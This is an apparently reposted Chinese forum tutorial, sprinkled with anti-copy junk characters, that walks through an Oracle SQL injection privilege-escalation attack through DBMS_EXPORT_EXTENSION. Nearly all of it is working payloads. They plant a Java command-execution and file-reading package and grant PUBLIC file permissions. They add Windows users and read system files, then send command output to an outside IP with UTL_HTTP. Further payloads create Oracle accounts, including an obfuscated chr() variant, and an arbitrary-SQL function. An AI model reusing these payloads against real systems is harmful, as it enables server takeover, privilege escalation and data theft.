以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
- }# U2 \" Y) @2 d
+ S9 S' y% J9 c. P" u: P /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) * U7 w3 T8 X4 g% R& S- j
的形式即可。(用" 'a'|| "是为了让语句返回true值)
! f2 ^/ \8 n, `: t6 U0 G- ?( G; \语句有点长,可能要用post提交。 9 ]. l: g; u+ e& q
以下是各个步骤:
. a& d% y* M6 T. t( \. T8 w" s1.创建包 . b6 S: ?( u! G) V, \1 c
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:, g5 a0 o9 E7 X) ]+ p- B- c4 k5 V# X
/xxx.jsp?id=1 and '1'<>'a'||( 1 g7 v% p' S8 ^- A4 \
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% c. w% Z* n! X, d; z. o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
0 F! s9 Q* i' @( e% }$ i. znew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
/ t9 X8 V: |9 r0 d! G5 i}'''';END;'';END;--','SYS',0,'1',0) from dual
P+ T2 y N3 ~9 |/ x( n( a) 5 M4 N$ B; ^% i w0 G5 \
------------------------
9 x& A, n9 s3 c, D: J如果url有长度限制,可以把readFile()函数块去掉,即: i) p5 } J& ~0 f7 U3 C) F; x1 k
/xxx.jsp?id=1 and '1'<>'a'||( L2 H* l& C3 H2 {
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& l: C# Z$ r5 H1 {1 rcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
6 ~" W* \+ l! cnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
) ~* M& q& t1 [0 F* p$ |! U}'''';END;'';END;--','SYS',0,'1',0) from dual
" `+ a" j0 g6 Y+ H4 ^6 z)
! b" K* c$ i0 b/ y同时把后面步骤 提到的 对readFile()的处理语句去掉。 ) O! K. u) S. S' G, [, x ]
------------------------------
- g X: U3 u2 `# E6 p( v* f2.赋Java权限
9 n; O" w; S" v3 d+ s5 yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual+ m+ z$ z1 ~+ ]( J# j4 y
3.创建函数
6 I7 W8 a% N$ W" G. Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
/ Y* ~. g5 i" G( g& lcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
9 p: A0 U8 Z/ ~" T K; ^* Y- _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ m( ]+ K1 C7 _: }) A# a8 J) f
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
( h/ |, ~0 g5 V5 P( Q3 W4.赋public执行函数的权限
5 p1 f. V7 j6 J4 F0 fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
1 P3 t7 Q8 K7 f& s. |" d5 ~( M" Eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual: K3 `3 n0 N6 K- D
5.测试上面的几步是否成功
! B" z( ]6 h7 @and '1'<>'11'||(
0 s+ C2 _: e) }4 d' mselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD' 5 i( x n1 a9 t
) ! J0 I9 {$ B# n9 i# {5 G4 }2 u, X/ S
and '1'<>( + H8 z4 R2 y, M% F- n+ }) A
select OBJECT_ID from all_objects where object_name ='LINXREADFILE' ; F5 H+ p& S4 b7 o8 t
)
7 c3 K3 z4 X" O; l; v2 _( k/ T6.执行命令: . e) @9 K0 N* a6 @ K3 x1 k
/xxx.jsp?id=1 and '1'<>( ) F5 g" s& C1 b& X4 p
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
0 q! l9 n: j P$ U- W! d. ]& J# R5 x. z) S' D( a3 A2 k p1 R
) 3 B2 a% v- j- K* K9 j) e
/xxx.jsp?id=1 and '1'<>( 6 I9 q# g7 c5 U9 A R/ d/ d4 G
select sys.LinxReadFile('c:/boot.ini') from dual" y) ]# R' _8 u4 ?! n
# m' T) y/ x5 L)
+ i8 u3 \5 E$ ~2 r& x / n2 \0 v* j5 A0 ]9 W
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
9 ]- A7 v* Y, l* A) p% b如果要查看运行结果可以用 union :
4 e/ i$ [1 q/ Y7 G# o k0 J/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual7 N: [0 ~/ M. }% I
或者UTL_HTTP.request(: " W) v7 p4 t0 d0 l
/xxx.jsp?id=1 and '1'<>( * O! Z ^. M5 l6 w- F
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
8 o' V0 @7 F; I3 S1 w6 h! T) 7 N# l+ t6 D( o' Y, q+ f( i
/xxx.jsp?id=1 and '1'<>( 4 }/ y. {9 t, R) ^
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual& h5 [& S6 F- v6 g
)
) J+ E8 _! Q) ^注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。4 \2 y: @$ M+ |. p; \: J
-------------------- 8 k8 L& w: a# w. D" c
6.内部变化 $ P' E7 z& t- f9 N W* G E! k
通过以下命令可以查看all_objects表达改变: z. o+ }+ @! _" q' u6 {
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'/ q* d6 K* R9 d# F
7.删除我们创建的函数
0 c. E+ F. e8 d# l+ Tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 Q' Z5 p6 c- [ C) J$ ]drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
+ W' b' U/ a9 N# Z2 K. l+ ? N: T====================================================
) ~ P. Z# n8 x; u/ |% O全文结束。谨以此文赠与我的朋友。
- N9 B6 K8 q# elinx , y" R( U. ~0 X: }; J
124829445
) P3 f$ L# ]# k; B2008.1.12 5 R% h7 H* V. q+ R* A) P
linyujian@bjfu.edu.cn 7 J% g$ \' p" _
====================================================================== " v$ L, A9 l* y0 q% I
测试漏洞的另一方法: . b3 v6 L9 _& F
创建oracle帐号:
8 q1 p! i6 m+ s) g$ ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- b' B7 F; j0 Y" w+ ?0 PCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
; f/ s2 q" k+ `% P即:
. D2 ^7 a D" i8 ?% Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),9 l& s1 p; f. h) S3 Y& ?1 n
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 2 _2 j/ I7 e6 _ c k6 G5 M/ |
确定漏洞存在:
% k0 q* l7 x7 ?1 y0 d1<>(
% W, ?0 ?) ?3 I1 y7 d, o9 [. d1 I2 fselect user_id from all_users where username='LINXSQL'
& Z8 z! K! N0 v9 |; t8 ?* |' n)
4 E2 v3 l. i( X/ G6 C# H" x; G给linxsql连接权限:
4 m8 u J, h. r* q& {) ]8 b) cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 n: J! O1 j0 G5 q, r* y. y- y7 T2 jGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 8 G. ^! l$ m6 l+ t5 _# O% ? n
删除帐号:
& f) v9 q0 |( T% ]4 {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! E4 ~: G! s: m+ y- d
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 0 D5 }% }( [9 K O
======================
l6 W& s( v$ w& T& m3 \以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
4 f$ ~0 R8 P& w6 @6 z$ x3 V1.jsp?id=1 and '1'<>( ) \/ B& W( x O6 D
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 h% K+ E) ?5 p3 ], Ycreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual$ _* X8 ?2 \; v1 P# o' B, L/ r
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
* K3 S% D; B0 E8 [& R )
|3 L4 i; N! A5 | Z, g# p% x) K& B* }
# k) c) K/ ?" l" j2 k- u- u
, p9 |& T$ g l/ D3 c8 q
|
发表于 2012-12-18 12:21:48
收藏
支持
反对